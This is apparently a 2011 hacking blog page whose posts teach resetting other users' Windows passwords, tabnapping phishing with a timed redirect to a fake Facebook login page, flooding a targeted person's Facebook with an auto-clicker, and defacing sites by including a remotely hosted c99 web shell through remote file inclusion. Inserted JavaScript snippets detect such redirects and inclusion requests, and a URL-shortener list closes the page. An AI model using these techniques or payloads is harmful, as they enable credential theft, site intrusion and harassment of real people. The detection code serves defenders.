Saturday, May 28, 2011

For this you need to be logged in to the computer with any user account (meaning you are a member of either the Administrators or the Users group).

Now follow the step-by-step instructions:

  1. Go to Run (press Windows key + R) and type control userpasswords2

  2. Select the user whose password you want to change.

  3. Click on the Reset Password tab (the reset tab will only be available if the particular account has a password) and reset the password.
     YOU ARE DONE :D

NOTE: The above trick will not work if you are a member of the Guests group.




INTRODUCTION:

Tab napping is a new type of phishing scam that does not require you to click on any URL to be redirected to the phishing site; instead it relies on the fact that a lot of people use tabbed browsing (opening multiple tabs while browsing). In tab napping, one of your inactive tabs is automatically replaced with a new page without your knowledge. Tab napping is a type of phishing that uses a smarter way to confuse the victim. For example, the victim was viewing page A in one browser tab, then left it idle and is now using some other website in another tab. After some time, page A will automatically change to the phishing page. The idea is to confuse the victim among the multiple tabs of the browser.


Now let's move on to the tutorial:
1. First we need a simple phishing setup that we have discussed before. You can get your phisher from here.

2. You will need your hosting, blog or any other web page in which you can put the JavaScript, so that you can send its link to the victim.

3. Get your JavaScript from here.

4. Now replace the link with your phishing page link in the JavaScript, in this line, which comes in two places in the script:

  timerRedirect = setInterval("location.href='http://facb00kloagin.my3gb.com/index.html'",10000); //set timed redirect

5. After replacing it, select all and copy the tab napping script, then paste this code at the end of the real page's HTML code (that is, above </html>).

6. This script will not make any change to your web page or blog page.

  • This script will track the user's actions, and as soon as the blog is left idle,
  • the script will redirect the victim to your phishing page.
  • Now send this blog address to your victim, or you can upload your malicious web page to a web host and then send the link to the victim.

7. For further improvement you can shorten your URL so that the victim won't be able to know your intentions. Get any URL shortener from here.

HERE IS A DEMO OF A TABNAPPING PAGE:

  # Just go HERE and keep yourself idle for 10 sec. You will be redirected to my phishing page.
Note: This is illegal and is for educational purposes only. Any loss/damage that happens will not be in any way our responsibility.
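For blog and site owners, the injected script described above leaves a recognisable trace in page source: a timer whose string argument assigns location.href to a host other than your own. The scanner below is an added example, not code from the original post; the function name findTimedRedirects, the host names and both sample pages are constructed for illustration.

```javascript
// Added example: flag timer-driven redirects to a foreign host in page source.
// Only string-form timers (as in the line quoted in step 4) are matched;
// function-form callbacks need a real JavaScript parser.
const TIMER_RE = /set(?:Interval|Timeout)\s*\(\s*(["'])((?:(?!\1).)*)\1\s*,\s*(\d+)\s*\)/g;
const NAV_RE = /(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']/;

function findTimedRedirects(html, ownHost) {
  const findings = [];
  for (const m of html.matchAll(TIMER_RE)) {
    const nav = NAV_RE.exec(m[2]);   // does the timer body navigate the tab?
    if (!nav) continue;
    let target;
    try {
      // Relative targets resolve against our own host and are not reported.
      target = new URL(nav[1], `https://${ownHost}/`);
    } catch {
      continue;                      // unparsable target: nothing to compare
    }
    if (target.hostname.toLowerCase() !== ownHost.toLowerCase()) {
      findings.push({ target: target.href, delayMs: Number(m[3]) });
    }
  }
  return findings;
}

// Constructed sample: a blog page with a timed off-site redirect appended.
const SAMPLE_INJECTED = `<html><body><p>My blog</p>
<script>
var timerRedirect = setInterval("location.href='http://login.phish.example/index.html'", 10000);
</script>
</body></html>`;

// Constructed sample: a legitimate same-site session-timeout redirect.
const SAMPLE_BENIGN = `<html><body>
<script>setTimeout("location.href='/session-expired.html'", 600000);</script>
</body></html>`;

console.log(findTimedRedirects(SAMPLE_INJECTED, 'blog.example'));
console.log(findTimedRedirects(SAMPLE_BENIGN, 'blog.example'));
```

Run it over every template and stored post body of a site you operate; any finding means a script on your page will move an idle visitor to another host.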

Tuesday, May 24, 2011


THINGS WE NEED:
1) A Facebook account and a slave (of course)
2) Auto-Clicker (in this tutorial we will use Auto Clicker v2.2 by Shocker)
Download: You can download it at the Official Site

NOTE: Detections are false positives. If you don't trust me you can run it sandboxed. (The file is virus free.)
3) The most important is BRAIN and COMMON SENSE

INSTRUCTIONS:
1) Log in to your Facebook account. Then, after logging in, open another tab/window and go to "m.facebook.com" (without quotes).
2) Go to Friends, type your slave's name, then click Search. Now go to your slave's profile.
3) Now for the third step, I will cut this into 3 parts: Wallpost Flood, Comment Flood and Messaging Flood.

-Wallpost Flood-

1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as they are except the "Number of Clicks".
2) Put your comment in the textbox. Then press F2. NOTE: Don't put your cursor on the "Post" button yet. Just place it in a blank space. After pressing F2, you will see the countdown of the Auto-Clicker in your taskbar (picture: Autoclicker countdown).
3) After you see the click progress in the taskbar (see picture), place your cursor on the "Post" button.
4) Now leave your cursor on the "Post" button while the Auto-Clicker runs. Leave it for at least a minute.
5) Finished. You've just flooded his Wall.

-Comment Flood-

NOTE: In this tutorial we will Comment Flood a profile picture. But you can also use Comment Flooding on Wallposts and other posts/pics/vids that can be commented on. Just use your common sense on how to do it.
1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as they are except the "Number of Clicks".
2) Click your slave's profile picture.
3) Pick a photo you want to comment on. (You can use the Next and Previous buttons to navigate to his other profile pics.)
4) Put your comment in the textbox. Then press F2. NOTE: Don't put your cursor on the "Comment" button yet. Just place it in a blank space. After pressing F2, you will see the countdown of the Auto-Clicker in your taskbar (picture: Autoclicker countdown).
5) After you see the click progress in the taskbar (see picture), place your cursor on the "Comment" button.
6) Now leave your cursor on the "Comment" button while the Auto-Clicker runs. Leave it for at least a minute.
7) Finished. You've just comment flooded a profile picture of your slave :))

-Message Flood-

1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as they are except the "Number of Clicks".
2) Click "Messages" beside his profile picture.
3) Put anything in the "Subject" and "Body Message".
4) Then press F2. NOTE: Don't put your cursor on the "Send" button yet. Just place it in a blank space. After pressing F2, you will see the countdown of the Auto-Clicker in your taskbar (picture: Autoclicker countdown).
5) After you see the click progress in the taskbar (see picture), place your cursor on the "Send" button.
6) Now leave your cursor on the "Send" button while the Auto-Clicker runs. Leave it for at least a minute.
7) Finished! You've just flooded an Inbox of your slave.

Thursday, May 19, 2011

I receive many e-mails on how to hack websites, so today I will demonstrate how hackers use remote file inclusion to deface websites.


Requirements
C99 shell


First of all visit Google and type

"index.php?page="

This will show all the pages which have index.php?page= in their URL. RFI vulnerabilities only work on those sites which have index.php?page= in their URL.


Now let's say that the website is as follows:


www.targetsite.com/index.php?page=something


So, to check the vulnerability, we will replace "something" with Google or any other site. If the Google homepage shows up inside the website, this means that the website is vulnerable to the attack. The URL will look like


www.targetsite.com/index.php?page=www.google.com



Once we know that the website is vulnerable to the attack, we will now include the c99 shell. To do it, download the c99 shell and then upload it to a web hosting site such as ripway, t35 and many more PHP web hostings.

Once the shell is uploaded you will have a unique url for your shell lets say it is
www.webhostingsite.com/c99.txt


Now to execute the shell in order to gain access to the website we will do as follows


http://www.targetsite.com/index.php?...e.com/c99.txt?


Don't forget the "?" or else it won't be executed.


Remember, this does not work on all websites, so the key is to try and try and try and try!

The most important things required are skills and a vulnerability; without a vulnerability you could do nothing. Also hide your IP.
Thanks @devendra
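From the defender's side, both the probe and the inclusion request described above appear in the web server's access log as a page= value that is a host name or a full URL instead of a local page name. The log check below is an added example, not code from the original post; the function names, the client addresses, the Common Log Format lines and the "letters, digits, underscore, hyphen" page-name policy are assumptions constructed for illustration.

```javascript
// Added example: flag access-log requests whose page= value is not a plain
// local page name. Names, log lines and naming policy are constructed.
const REQUEST_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/;
const LOCAL_PAGE_RE = /^[A-Za-z0-9_-]+$/;            // assumed local naming policy

function classifyPageValue(value) {
  if (LOCAL_PAGE_RE.test(value)) return 'local';
  // scheme://host or protocol-relative //host means a remote resource
  if (/^[a-z][a-z0-9+.-]*:\/\//i.test(value) || value.startsWith('//')) return 'remote-url';
  return 'not-a-page-name';                          // dots, slashes, etc.
}

function flagRemoteIncludes(logText, param = 'page') {
  const hits = [];
  for (const line of logText.split('\n')) {
    const m = REQUEST_RE.exec(line);
    if (!m) continue;
    // Everything after the first "?" is the query; keep a trailing "?" in it.
    const query = m[2].split('?').slice(1).join('?');
    for (const pair of query.split('&')) {
      const eq = pair.indexOf('=');
      if (eq < 0 || pair.slice(0, eq) !== param) continue;
      let value = pair.slice(eq + 1);
      try { value = decodeURIComponent(value); } catch { /* bad %-escape: keep raw */ }
      const verdict = classifyPageValue(value);
      if (verdict !== 'local') hits.push({ client: m[1], value, verdict });
    }
  }
  return hits;
}

// Constructed log: one normal request, the probe, and the inclusion request.
const SAMPLE_LOG = `
203.0.113.7 - - [19/May/2011:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
198.51.100.23 - - [19/May/2011:10:02:10 +0000] "GET /index.php?page=www.google.com HTTP/1.1" 200 9211
198.51.100.23 - - [19/May/2011:10:03:44 +0000] "GET /index.php?page=http%3A%2F%2Fwww.webhostingsite.com%2Fc99.txt%3F HTTP/1.1" 200 311
`;

console.log(flagRemoteIncludes(SAMPLE_LOG));
```

The durable fix is in the application: map the page parameter to a fixed allowlist of local files instead of passing it to include, and keep PHP's allow_url_include setting off.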

Tuesday, May 17, 2011

A list of good URL shorteners on the Web..!!!


URL shortener
With the explosion of social media sites like Twitter, where concision matters the most, URL shortening services have become very important tools. In this article, I would like to share a list that I have compiled over the years. My favorite shorteners are bolded.
*As URL shortening services come and go, feel free to let me know which ones in this article are discontinued.*
  • 6URL.com: Customize URLs and hide affiliate links.
  • adf.ly:
  • Adjix: "Short Links. Tiny Ads. Big Payoff." Requires you to open an account and comes with a browser bookmarklet.
  • Beam.to: You can password-protect your links.
  • bit.ly: One-click shortening service with a simple URL tracking feature and customization option. Comes with a browser bookmarklet.
  • blinky.me: "blinky.me is integrated with Sellebrity, giving you a world of analytics not available with any other URL shortener. With Sellebrity installed on your site, you'll get piles of additional data about the people who click your links after they arrive at your site, something no other shortener can give you."
  • BudURL: Paying service (starts at $8/month) that allows you to track where links are clicked in real time.
  • Cligs: "Cligs is 100% search engine friendly. We do NOT block any robots/bots/crawlers/spiders (whatever you want to call them). Also, Cligs uses 301 forwarding which is the most search engine friendly forwarding method recommended by Google, Yahoo!, and Microsoft." The service comes with great tools.
  • DecentURL: "Making ugly URLS decent". You need to open an account. The service also offers a browser bookmarklet.
  • DigBig: "DigBig is free, and for work-related purposes only. The service is actively monitored for abuse."
  • Doiop: "Doiop creates for you a short URL with a keyword you choose, making it easy to remember or give away. This link will not break in emails and never expire."
  • easyURL: Another customizable URL shortening service.
  • Google URL Shortener: Simple tool which creates 301(permanent) redirect URLs and stats.
  • ho.io: Another simple and customizable URL Shortener that comes with two types of browser bookmarklets.
  • HotRedirect: Choose from eight different domain names to shorten your long links.
  • is.gd: Create customizable shortened links and access stats with a click of your mouse.
  • Linkasa: "Shorter Safer Sweeter Links." Another great service that allows you to see a temporary page before accessing the target website, and hence avoid bad surprises such as ads and inappropriate content.
  • Metamark: Password-protect your short URLs.
  • Moourl: "Welcome to the web's cutest URL shortening service. If you have a really loooong URL, just paste it in the text field below, and we'll milk it, creating a moourl for you. It lasts forever, It can be easily copied to your clipboard, and it's really cute." Also comes with a browser bookmarklet.
  • mx.vc: Shorten your long links and share on major social networking sites with a click of your mouse.
  • MyURL: Several alternative shortened links, affiliate link cloaking and link-protection for files hosted on some free file hosting websites.
  • Ne1: "We offer two types redirection modes: direct redirection and cloaked redirection where the target/true URL is hidden. All new accounts start as normal accounts with cloaked redirection with a small warning/ad frame at the top of the page."
  • NotifyURL: Get an email the first time someone visits your new link.
  • notlong: Personalize the subdomain on your short link and password-protect your URL. Comes with a browser bookmarklet.
  • NutshellURL: No expiry date for your shortened link and you can use a personal name.
  • Ow.ly: Hootsuite's shortener.
  • Profile.to: A URL shortener for Facebook profiles, groups and Fan Pages.
  • QT.vc: Register for a free account to shorten your links.
  • ShadyURL: "Don't just shorten your URL, make it suspicious and frightening."
  • Shim.net: Choose among seven domain names to personalize your shortened links.
  • Shorl: Another interesting URL shortening service.
  • ShortURL: Customizable subdomains, URL masking and traffic reports.
  • Shorty: "Shorty is a simple tool for creating shorter, human-readable links from long URLs. You install Shorty on your server, so the links you create with it never go away. You can also manage your links and see how often people click on them."
  • Shrvl:  The service reduces your long links to 22 characters and can store any URL for later use.
  • SimURL: Embed the SimURL box on your website / blog to allow your visitors to shorten long URLs.
  • SnipURL: Another interesting service that offers features like URL sharing, profile pages, RSS feeds of latest Snips and password protection.
  • Su.pr: This service is provided by StumbleUpon.
  • TakeMe.to: Free for simple link shortening. Customization is provided for a small fee.
  • TightURL: A simple service with browser bookmarklet.
  • TINY.cc: Customize your links and access stats.
  • TinyFav: Share your favorite sites with people without sending them several different links.
  • TinyURL: Great URL shortening tool allowing customization and affiliate link masking. Comes with a browser bookmarklet.
  • TraceURL: Create short links and trace how many people click on them.
  • Tweetburner: Keep track of the links you share on Twitter and Friendfeed.
  • U2S - URL 2 Short: Link customization, password protection, expiry dates and stats.
  • Ulimit: "Ulimit is a domain name service that gives you a lifetime permanent address for your e-mail and Web site. This address is both reliable and easy to remember."
  • URL.co.uk: Another simple URL shortening service.
  • URLcut: Password-protect and customize your shortened links.
  • url.ie: Another interesting URL shortening service with an appealing design. Features: QR barcodes and a browser bookmarklet.
  • Webalias: Choose from a list of 30 domain names to make your shortened link stand out!
  • Yep That URL: You can customize your shortened links with tags. The service also features QR barcodes and displays the top clicked links in its database.
  • Yourls: "YOURLS is a small set of PHP scripts that will allow you to run your own URL shortening service (à la TinyURL). You can make it private or public, you can pick custom keyword URLs, it comes with its own API."
Do you use URL shorteners? If so, which are your favorites?